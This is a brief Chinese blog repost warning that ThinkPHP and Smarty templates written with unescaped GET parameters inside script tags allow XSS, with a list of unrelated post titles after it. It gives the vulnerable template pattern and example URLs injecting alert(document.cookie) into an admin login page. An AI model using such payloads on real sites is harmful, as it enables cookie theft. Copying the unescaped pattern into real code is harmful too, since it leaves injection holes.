thinkphp等框架开发中容易忽略的xss攻击
来源:互联网 发布:大数据前沿技术及应用 编辑:程序博客网 时间:2024/04/30 04:55
来自http://wp.iyouths.org/256.html
主要在get请求中
<script>(function(){ var a = {:$_GET['b']}; //.... })()</script>
admin.php/Login/index/?b=%27%27;alert(document.cookie);//
后台比如攻击方式http://shop/index.php/admin/Manager/login/?b="1";alert(document.cookie);// 能够成功
用smarty模板的如下
<script>(function(){ var a = {$smarty.get['b']}})()</script>
0 0
- thinkphp等框架开发中容易忽略的xss攻击
- thinkphp等框架开发中容易忽略的xss攻击
- 开发容易忽略的框架
- 不可忽略的xss攻击
- ThinkPhp中防止Xss攻击
- JDK版本--开发中容易被忽略的问题
- iOS开发过程中容易忽略的关键之处
- web攻击XSS等
- Python开发容易忽略的问题
- C#中容易忽略的一些概念
- C中容易忽略的知识点
- JS中容易被忽略的基础知识
- servlet,jsp中容易忽略的细节
- 电路设计中容易忽略的几个问题
- java中容易忽略的shuffle用法
- Oracle中容易被忽略的地方
- java中容易忽略的shuffle用法
- 关于JSP中容易忽略的知识
- 计算机网络通过ip来知道对方的主机名
- JAVA SE 8 学习笔记(一)lambda表达式
- java注解
- java异常体系2
- 第四次C++作业
- thinkphp等框架开发中容易忽略的xss攻击
- 跟我学AngularJs:Aop拦截实例
- 第八周项目3-指向学生类的指针
- POJ2965,递归出来的!
- Android开发平台搭建一般步骤[2016.4.28]
- LeetCode Gas Station
- sql行转列
- 提取出图像中感兴趣的部分,cvSetImageRoi已经过时,更牛逼Rect解决问题
- 使用httpclient提交数据